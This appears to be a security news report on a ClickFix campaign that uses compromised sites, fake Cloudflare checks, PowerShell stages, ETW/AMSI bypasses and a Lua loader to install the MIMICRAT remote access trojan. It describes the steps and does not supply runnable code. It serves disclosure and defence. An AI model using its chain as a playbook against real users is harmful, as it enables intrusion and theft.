ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware
Source: The Hacker News
Overview
Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (also known as AstarionRAT).
Elastic Security Labs described the operation as highly sophisticated, noting that compromised sites across multiple industries and geographies serve as the delivery infrastructure. A multi‑stage PowerShell chain performs ETW and AMSI bypasses before dropping a Lua‑scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using traffic patterns that resemble legitimate web‑analytics requests.
MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post‑exploitation capabilities. The campaign was discovered earlier this month and appears to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress, which uses the Matanbuchus 3.0 loader as a conduit for the same RAT. The ultimate goal is suspected to be ransomware deployment or data exfiltration.
Infection Chain
- Initial compromise – The entry point is
bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached. - Malicious JavaScript injection – Injected script loads an externally hosted PHP payload.
- Fake Cloudflare verification – The PHP script displays a counterfeit verification page, prompting the victim to copy‑paste a command into the Windows Run dialog.
- PowerShell execution – The command runs PowerShell, which contacts a C2 server to fetch a second‑stage PowerShell script.
- ETW and AMSI bypass – The second‑stage script patches Windows Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI).
- Lua‑based loader – After bypasses, a Lua script is dropped. This script decrypts and executes in‑memory shellcode.
- MIMICRAT deployment – The shellcode delivers the MIMICRAT implant.
Technical Details
- Communication – MIMICRAT uses HTTPS for C2 traffic, blending with legitimate web‑analytics patterns on port 443.
- Capabilities – The RAT accepts roughly two dozen commands, enabling:
- Process and file‑system control
- Interactive shell access
- Token manipulation and impersonation
- Shellcode injection
- SOCKS5 proxy tunneling
- Localization – The lure content is dynamically localized into 17 languages based on the victim’s browser settings, broadening its reach.
- Observed victims – Infections have been reported in a U.S. university and among Chinese‑speaking users discussed in public forums, indicating opportunistic targeting across geographies.
References
- ClickFix campaign overview:
- Elastic Security Labs report:
- Overlap with Huntress‑documented campaign:
- ETW documentation:
- AMSI documentation: